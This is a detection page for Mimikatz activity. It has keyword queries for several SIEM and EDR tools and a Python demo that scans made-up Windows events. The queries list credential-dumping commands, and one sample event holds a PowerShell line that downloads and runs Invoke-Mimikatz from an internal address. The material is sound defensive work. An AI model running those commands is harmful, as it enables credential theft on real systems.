Regular Mimikatz Usage Detection Expression

This method detects Mimikatz keywords in the message field of different Windows event logs. Some of these strings only appear in older Mimikatz versions, which are nevertheless still used by various threat groups. Note that the bare word "mimikatz" also matches benign references (detection rule file names, tools and scripts named after it), so a hit on the name alone is lower confidence than a hit on one of the module commands (privilege::debug, sekurlsa::logonpasswords, lsadump::sam) or on the driver and DLL names.

  • Elastic Query
event.message:(*mimikatz* OR *mimilib* OR *<3\ eo.oe* OR *eo.oe.kiwi* OR *privilege\:\:debug* OR *sekurlsa\:\:logonpasswords* OR *lsadump\:\:sam* OR *mimidrv.sys*)
  • QRadar AQL
SELECT UTF8(payload) as search_payload from events where (LOGSOURCETYPENAME(devicetype) ilike '%Microsoft Windows Security Event Log%' and (search_payload ilike '%mimikatz%' or search_payload ilike '%mimilib%' or search_payload ilike '%<3 eo.oe%' or search_payload ilike '%eo.oe.kiwi%' or search_payload ilike '%privilege::debug%' or search_payload ilike '%sekurlsa::logonpasswords%' or search_payload ilike '%lsadump::sam%' or search_payload ilike '%mimidrv.sys%'))
  • Splunk
("mimikatz" OR "mimilib" OR "<3 eo.oe" OR "eo.oe.kiwi" OR "privilege::debug" OR "sekurlsa::logonpasswords" OR "lsadump::sam" OR "mimidrv.sys")
  • EDR Carbon Black
(mimikatz OR mimilib OR <3 eo.oe OR eo.oe.kiwi OR privilege::debug OR sekurlsa::logonpasswords OR lsadump::sam OR mimidrv.sys)
  • Windows PowerShell
# Get-WinEvent needs at least one log to read (it fails or prompts when called bare); extend the LogName array, e.g. with 'Microsoft-Windows-PowerShell/Operational', as required. Reading Security requires an elevated session.
Get-WinEvent -FilterHashtable @{LogName='Security','System','Application'} | where { $_.Message -match "mimikatz|mimilib|<3 eo\.oe|eo\.oe\.kiwi|privilege::debug|sekurlsa::logonpasswords|lsadump::sam|mimidrv\.sys" } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
  • Qualys
(mimikatz or mimilib or <3 eo.oe or eo.oe.kiwi or privilege::debug or sekurlsa::logonpasswords or lsadump::sam or mimidrv.sys)
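
As an added example (not code from the original page), the same keyword match implemented in Python and run over a handful of constructed Windows event messages, with a fidelity label that separates the bare word "mimikatz" from the module commands, banner fragments and driver/DLL names. The sample events, record IDs, host paths and the download URL are made up for the demonstration; the keyword list is the one used by the queries above.

```python
import re
from typing import Dict, List

# Keyword list taken from the queries above. The bare name "mimikatz" is the
# weakest indicator; the module commands ("privilege::debug", ...) and the
# driver/DLL names are far more specific to an actual execution.
MIMIKATZ_KEYWORDS = [
    "mimikatz", "mimilib", "<3 eo.oe", "eo.oe.kiwi",
    "privilege::debug", "sekurlsa::logonpasswords", "lsadump::sam", "mimidrv.sys",
]
LOW_FIDELITY = {"mimikatz"}

# One case-insensitive alternation with every literal escaped, so "." and "<"
# match themselves instead of acting as regex metacharacters.
_PATTERN = re.compile("|".join(re.escape(k) for k in MIMIKATZ_KEYWORDS), re.IGNORECASE)


def find_mimikatz_keywords(message: str) -> List[str]:
    """Return the distinct keywords (lower-cased, sorted) found in one event message."""
    return sorted({m.group(0).lower() for m in _PATTERN.finditer(message)})


def scan_events(events: List[Dict]) -> List[Dict]:
    """Run the keyword check over a list of event dicts and return the hits.

    Each hit carries the matched keywords plus a fidelity label: "high" when at
    least one module command, banner string or binary name matched, "low" when
    only the bare word "mimikatz" did (often a file name, rule name or URL).
    """
    hits = []
    for ev in events:
        keywords = find_mimikatz_keywords(ev.get("message", ""))
        if not keywords:
            continue
        fidelity = "low" if set(keywords) <= LOW_FIDELITY else "high"
        hits.append({"record_id": ev["record_id"], "event_id": ev["event_id"],
                     "fidelity": fidelity, "keywords": keywords})
    return hits


# Constructed sample events (hypothetical, not captured from a real host).
SAMPLE_EVENTS = [
    {"record_id": 101, "event_id": 4688,
     "message": ("A new process has been created. New Process Name: "
                 "C:\\Users\\bob\\Downloads\\mimikatz.exe Process Command Line: "
                 "mimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit")},
    {"record_id": 102, "event_id": 4104,
     "message": ("Creating Scriptblock text (1 of 1): IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1'); "
                 "Invoke-Mimikatz -DumpCreds")},
    {"record_id": 103, "event_id": 7045,
     "message": ("A service was installed in the system. Service Name: mimidrv "
                 "Service File Name: C:\\Windows\\Temp\\mimidrv.sys "
                 "Service Type: kernel mode driver")},
    {"record_id": 104, "event_id": 4688,
     "message": ("A new process has been created. New Process Name: "
                 "C:\\Windows\\System32\\svchost.exe Process Command Line: "
                 "svchost.exe -k netsvcs -p")},
    # Benign: an analyst unpacking detection rules whose file name contains the word.
    {"record_id": 105, "event_id": 4688,
     "message": ("A new process has been created. Process Command Line: "
                 "\"C:\\Program Files\\7-Zip\\7z.exe\" x C:\\IR\\rules\\"
                 "proc_creation_win_mimikatz_command_line.yml")},
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(f"record {hit['record_id']} (event {hit['event_id']}): "
              f"{hit['fidelity']} fidelity, matched {hit['keywords']}")
```

Record 104 produces no hit; records 101 and 103 come back as high fidelity, while 102 (a PowerShell script block invoking Invoke-Mimikatz) and 105 (a rule file whose name contains the word) both come back as low fidelity. The label is only a triage aid: 102 is a real execution that the keyword list cannot distinguish from 105, which is exactly why the bare name should be escalated by context (parent process, user, command line) rather than on its own.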
